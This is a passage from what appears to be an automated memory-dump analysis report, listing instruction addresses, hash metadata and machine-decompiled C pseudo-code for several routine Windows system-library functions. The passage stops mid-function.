                                                                                                                                                    0x03146dec
                                                                                                                                                    0x03146def
                                                                                                                                                    0x03146df2
                                                                                                                                                    0x03146df5
                                                                                                                                                    0x03146dfe
                                                                                                                                                    0x03146e04
                                                                                                                                                    0x03146e09
                                                                                                                                                    0x03146e0d
                                                                                                                                                    0x03146e18
                                                                                                                                                    0x03146e1b
                                                                                                                                                    0x03146e22
                                                                                                                                                    0x03146e2d
                                                                                                                                                    0x03146e30
                                                                                                                                                    0x03146e36
                                                                                                                                                    0x03146e42
                                                                                                                                                    0x03146e4d
                                                                                                                                                    0x03146e50
                                                                                                                                                    0x03146e55
                                                                                                                                                    0x03146e5c
                                                                                                                                                    0x03146e6e
                                                                                                                                                    0x03146e5e
                                                                                                                                                    0x03146e67
                                                                                                                                                    0x03146e67
                                                                                                                                                    0x03146e73
                                                                                                                                                    0x03146e74
                                                                                                                                                    0x03146e77
                                                                                                                                                    0x03146e7c
                                                                                                                                                    0x03146e7d
                                                                                                                                                    0x03146e8e
                                                                                                                                                    0x03146e93
                                                                                                                                                    0x03146e9c
                                                                                                                                                    0x03146ea8
                                                                                                                                                    0x03146eab
                                                                                                                                                    0x03146eac
                                                                                                                                                    0x03146eb3
                                                                                                                                                    0x03146ecd
                                                                                                                                                    0x03146edc
                                                                                                                                                    0x03146ee2
                                                                                                                                                    0x03146ee5
                                                                                                                                                    0x03146ef2
                                                                                                                                                    0x03146efb
                                                                                                                                                    0x03146f01
                                                                                                                                                    0x03146f06
                                                                                                                                                    0x03146f0b
                                                                                                                                                    0x03146f11
                                                                                                                                                    0x03146f1a
                                                                                                                                                    0x03146f22
                                                                                                                                                    0x03146f26
                                                                                                                                                    0x03146f26
                                                                                                                                                    0x03146f33
                                                                                                                                                    0x03146f41
                                                                                                                                                    0x03146f44
                                                                                                                                                    0x03146f47
                                                                                                                                                    0x03146f54
                                                                                                                                                    0x03146f65
                                                                                                                                                    0x03146f77
                                                                                                                                                    0x03146f7c
                                                                                                                                                    0x03146f82
                                                                                                                                                    0x03146f91
                                                                                                                                                    0x03146f99
                                                                                                                                                    0x03146fa3
                                                                                                                                                    0x03146fae
                                                                                                                                                    0x03146fae
                                                                                                                                                    0x03146fba
                                                                                                                                                    0x03146fbb
                                                                                                                                                    0x03146fbc
                                                                                                                                                    0x03146fc1
                                                                                                                                                    0x03146fc2
                                                                                                                                                    0x03146fd3
                                                                                                                                                    0x03146fd8
                                                                                                                                                    0x03146fd8
                                                                                                                                                    0x03146fdf
                                                                                                                                                    0x03146fe8
                                                                                                                                                    0x03146fee
                                                                                                                                                    0x03146fee
                                                                                                                                                    0x03146ff5
                                                                                                                                                    0x03146ffb
                                                                                                                                                    0x03146ffb
                                                                                                                                                    0x03147004
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0314700a
                                                                                                                                                    0x03147004
                                                                                                                                                    0x03146eb3
                                                                                                                                                    0x03146e9c
                                                                                                                                                    0x03147015

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                                                                    • Instruction ID: 6171d6984fa7c0dc65093d717746a43151def087e205872fa81dce2382af7ded
                                                                                                                                                    • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                                                                    • Instruction Fuzzy Hash: DF716D75A00209EFCB11DFA5C984EEEFBB9FF88714F144569E505AB290DB34EA41CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030C52A5, Relevance: .2, Instructions: 161COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                                    			E030C52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E030DEEF0(0x31b79a0);
					_t104 =  *0x31b8210; // 0x841e88
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E030DEB70(_t93, 0x31b79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E03109890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E030DEEF0(0x31b79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E030DEB70(0, 0x31b79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x841e95
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E030FF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E030DEEF0(0x31b79a0);
									__eflags =  *0x31b8210 - _t104; // 0x841e88
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x31b8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E03144888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E030DEB70(_t95, 0x31b79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E031095D0();
											L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E031095D0();
											L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E030DEB70(_t93, 0x31b79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E031095D0();
										L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E031095D0();
										L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E030FF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                                                                                                    0x030c52a5
                                                                                                                                                    0x030c52ad
                                                                                                                                                    0x030c52b0
                                                                                                                                                    0x030c52b3
                                                                                                                                                    0x030c52b7
                                                                                                                                                    0x030c52ba
                                                                                                                                                    0x030c52bf
                                                                                                                                                    0x030c52c4
                                                                                                                                                    0x030c52cc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c52ce
                                                                                                                                                    0x030c52d9
                                                                                                                                                    0x030c52dd
                                                                                                                                                    0x030c52e7
                                                                                                                                                    0x030c52f7
                                                                                                                                                    0x030c52f9
                                                                                                                                                    0x030c52fd
                                                                                                                                                    0x03120dcf
                                                                                                                                                    0x03120dd5
                                                                                                                                                    0x03120dd6
                                                                                                                                                    0x03120dd7
                                                                                                                                                    0x03120dd8
                                                                                                                                                    0x03120dd9
                                                                                                                                                    0x03120dde
                                                                                                                                                    0x03120ddf
                                                                                                                                                    0x03120de0
                                                                                                                                                    0x03120de1
                                                                                                                                                    0x03120de2
                                                                                                                                                    0x03120de5
                                                                                                                                                    0x03120dea
                                                                                                                                                    0x03120dec
                                                                                                                                                    0x03120f60
                                                                                                                                                    0x03120f64
                                                                                                                                                    0x03120f70
                                                                                                                                                    0x03120f76
                                                                                                                                                    0x03120f79
                                                                                                                                                    0x03120f79
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03120f64
                                                                                                                                                    0x03120df2
                                                                                                                                                    0x03120df7
                                                                                                                                                    0x03120e04
                                                                                                                                                    0x03120e0d
                                                                                                                                                    0x03120e0d
                                                                                                                                                    0x03120e10
                                                                                                                                                    0x03120e1a
                                                                                                                                                    0x03120e1c
                                                                                                                                                    0x03120e4c
                                                                                                                                                    0x03120e52
                                                                                                                                                    0x03120e61
                                                                                                                                                    0x03120e67
                                                                                                                                                    0x03120e6b
                                                                                                                                                    0x03120e70
                                                                                                                                                    0x03120e76
                                                                                                                                                    0x03120ed7
                                                                                                                                                    0x03120edc
                                                                                                                                                    0x03120ee0
                                                                                                                                                    0x03120ee6
                                                                                                                                                    0x03120eea
                                                                                                                                                    0x03120eed
                                                                                                                                                    0x03120ef0
                                                                                                                                                    0x03120ef3
                                                                                                                                                    0x03120ef6
                                                                                                                                                    0x03120ef9
                                                                                                                                                    0x03120efe
                                                                                                                                                    0x03120f01
                                                                                                                                                    0x03120f01
                                                                                                                                                    0x03120f0b
                                                                                                                                                    0x03120f12
                                                                                                                                                    0x03120f16
                                                                                                                                                    0x03120f18
                                                                                                                                                    0x03120f1b
                                                                                                                                                    0x03120f2c
                                                                                                                                                    0x03120f31
                                                                                                                                                    0x03120f31
                                                                                                                                                    0x03120f35
                                                                                                                                                    0x03120f39
                                                                                                                                                    0x03120f3a
                                                                                                                                                    0x03120f3c
                                                                                                                                                    0x03120f3f
                                                                                                                                                    0x03120f50
                                                                                                                                                    0x03120f55
                                                                                                                                                    0x03120f55
                                                                                                                                                    0x03120f59
                                                                                                                                                    0x030c52eb
                                                                                                                                                    0x030c52f1
                                                                                                                                                    0x030c52f1
                                                                                                                                                    0x03120e7d
                                                                                                                                                    0x03120e84
                                                                                                                                                    0x03120e88
                                                                                                                                                    0x03120e8a
                                                                                                                                                    0x03120e8d
                                                                                                                                                    0x03120e9e
                                                                                                                                                    0x03120ea3
                                                                                                                                                    0x03120ea3
                                                                                                                                                    0x03120ea7
                                                                                                                                                    0x03120eaf
                                                                                                                                                    0x03120eb3
                                                                                                                                                    0x03120eb9
                                                                                                                                                    0x03120eb9
                                                                                                                                                    0x03120ebc
                                                                                                                                                    0x03120ecd
                                                                                                                                                    0x03120ecd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03120eb3
                                                                                                                                                    0x03120e21
                                                                                                                                                    0x03120e2b
                                                                                                                                                    0x03120e2f
                                                                                                                                                    0x03120e30
                                                                                                                                                    0x03120e3a
                                                                                                                                                    0x03120e3f
                                                                                                                                                    0x03120e41
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03120e47
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03120e47
                                                                                                                                                    0x03120df9
                                                                                                                                                    0x03120dfe
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03120dfe
                                                                                                                                                    0x030c5303
                                                                                                                                                    0x030c5307
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c5309
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c5309
                                                                                                                                                    0x030c5307
                                                                                                                                                    0x030c52e9
                                                                                                                                                    0x030c52e9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c52e9
                                                                                                                                                    0x030c530e
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0bd95cd1cdec0204b36dfb8d09540336562c9e6c9c1e2a93cd928b945806d84f
                                                                                                                                                    • Instruction ID: b4112dea3280680ce793bb29e0f90a5e5f325eb6dd734e7c3f01ce898153bb77
                                                                                                                                                    • Opcode Fuzzy Hash: 0bd95cd1cdec0204b36dfb8d09540336562c9e6c9c1e2a93cd928b945806d84f
                                                                                                                                                    • Instruction Fuzzy Hash: 9E51BC382067829FD720EF65C841B6BBBE8FF89710F14091EE4958B691E7B0E850C792
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030F2AE4, Relevance: .2, Instructions: 159COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E030F2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x31b8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x31b8208; // 0x31b8207
				_t8 = _t57 + 0x31b8208; // 0x31b8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x31b8450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x31b821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x31b6d5c; // 0x7f2e0654
							_t72 =  *0x31b6d5c; // 0x7f2e0654
							_t75 =  *0x31b6d5c; // 0x7f2e0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x31b6d5c; // 0x7f2e0654
							_t84 =  *0x31b6d5c; // 0x7f2e0654
							_t87 =  *0x31b6d5c; // 0x7f2e0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0310F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                                                                                                                    0x030f2ae4
                                                                                                                                                    0x030f2aec
                                                                                                                                                    0x030f2aef
                                                                                                                                                    0x030f2af4
                                                                                                                                                    0x030f2af7
                                                                                                                                                    0x030f2afd
                                                                                                                                                    0x030f2b92
                                                                                                                                                    0x030f2b92
                                                                                                                                                    0x030f2b97
                                                                                                                                                    0x030f2b9c
                                                                                                                                                    0x030f2b9c
                                                                                                                                                    0x030f2b03
                                                                                                                                                    0x030f2b06
                                                                                                                                                    0x030f2b09
                                                                                                                                                    0x030f2b09
                                                                                                                                                    0x030f2b0f
                                                                                                                                                    0x030f2b15
                                                                                                                                                    0x030f2b15
                                                                                                                                                    0x030f2b1b
                                                                                                                                                    0x030f2b1e
                                                                                                                                                    0x030f2b21
                                                                                                                                                    0x030f2b26
                                                                                                                                                    0x030f2b29
                                                                                                                                                    0x030f2b81
                                                                                                                                                    0x030f2b84
                                                                                                                                                    0x030f2c0e
                                                                                                                                                    0x030f2c15
                                                                                                                                                    0x030f2c24
                                                                                                                                                    0x030f2c24
                                                                                                                                                    0x030f2b8a
                                                                                                                                                    0x030f2b8a
                                                                                                                                                    0x030f2b8a
                                                                                                                                                    0x030f2b8a
                                                                                                                                                    0x030f2b90
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2b4a
                                                                                                                                                    0x030f2b4a
                                                                                                                                                    0x030f2b4d
                                                                                                                                                    0x030f2b53
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2b55
                                                                                                                                                    0x030f2b58
                                                                                                                                                    0x030f2bb7
                                                                                                                                                    0x03135d1b
                                                                                                                                                    0x03135d37
                                                                                                                                                    0x03135d47
                                                                                                                                                    0x03135d53
                                                                                                                                                    0x030f2bbd
                                                                                                                                                    0x030f2bbd
                                                                                                                                                    0x030f2bbd
                                                                                                                                                    0x030f2bb7
                                                                                                                                                    0x030f2b5d
                                                                                                                                                    0x030f2c2f
                                                                                                                                                    0x03135d5b
                                                                                                                                                    0x03135d77
                                                                                                                                                    0x03135d87
                                                                                                                                                    0x03135d93
                                                                                                                                                    0x030f2c35
                                                                                                                                                    0x030f2c35
                                                                                                                                                    0x030f2c35
                                                                                                                                                    0x030f2c2f
                                                                                                                                                    0x030f2b65
                                                                                                                                                    0x030f2b9f
                                                                                                                                                    0x030f2ba2
                                                                                                                                                    0x030f2b67
                                                                                                                                                    0x030f2b67
                                                                                                                                                    0x030f2b69
                                                                                                                                                    0x030f2b6b
                                                                                                                                                    0x030f2b6e
                                                                                                                                                    0x030f2bc9
                                                                                                                                                    0x030f2bcc
                                                                                                                                                    0x030f2bcf
                                                                                                                                                    0x030f2bd4
                                                                                                                                                    0x030f2bd6
                                                                                                                                                    0x030f2bd6
                                                                                                                                                    0x030f2bdb
                                                                                                                                                    0x030f2c02
                                                                                                                                                    0x030f2c05
                                                                                                                                                    0x030f2c07
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2c07
                                                                                                                                                    0x030f2be0
                                                                                                                                                    0x030f2c00
                                                                                                                                                    0x030f2c3f
                                                                                                                                                    0x030f2c3f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2c00
                                                                                                                                                    0x030f2be5
                                                                                                                                                    0x030f2be7
                                                                                                                                                    0x030f2bec
                                                                                                                                                    0x030f2bf4
                                                                                                                                                    0x030f2bf6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2bf6
                                                                                                                                                    0x030f2b70
                                                                                                                                                    0x030f2b76
                                                                                                                                                    0x030f2b2b
                                                                                                                                                    0x030f2b2b
                                                                                                                                                    0x030f2b2d
                                                                                                                                                    0x030f2b2f
                                                                                                                                                    0x030f2b32
                                                                                                                                                    0x030f2b35
                                                                                                                                                    0x030f2b3a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2b40
                                                                                                                                                    0x030f2b43
                                                                                                                                                    0x030f2b45
                                                                                                                                                    0x030f2b47
                                                                                                                                                    0x030f2b4a
                                                                                                                                                    0x030f2b4d
                                                                                                                                                    0x030f2b53
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2b53
                                                                                                                                                    0x030f2b78
                                                                                                                                                    0x030f2b78
                                                                                                                                                    0x030f2b7b
                                                                                                                                                    0x030f2b7e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2b7e
                                                                                                                                                    0x030f2b76
                                                                                                                                                    0x030f2ba5
                                                                                                                                                    0x030f2ba5
                                                                                                                                                    0x030f2ba8
                                                                                                                                                    0x030f2bad
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2baf
                                                                                                                                                    0x030f2baf
                                                                                                                                                    0x030f2bc2
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 97545f5b11798be54514ed4e59e4eb13be99ffd1dc52f011b27e0345bd8d8c00
                                                                                                                                                    • Instruction ID: e55e1840e40cbfad266aa2c204b0a9e65b62fd698edcefe9f1fbfd44de59dea8
                                                                                                                                                    • Opcode Fuzzy Hash: 97545f5b11798be54514ed4e59e4eb13be99ffd1dc52f011b27e0345bd8d8c00
                                                                                                                                                    • Instruction Fuzzy Hash: CC51C47AA01115CFCB18DF1CC8809BDB7FAFB88700715895AED46AB754D734AA81CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0318AE44, Relevance: .2, Instructions: 152COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                    			E0318AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0318C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0318ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0318FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0318EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E030E7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E03181608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E03191536(0x31b8ae4, (_t74 -  *0x31b8b04 >> 0x14) + (_t74 -  *0x31b8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0318C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0318A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0316CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0318ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
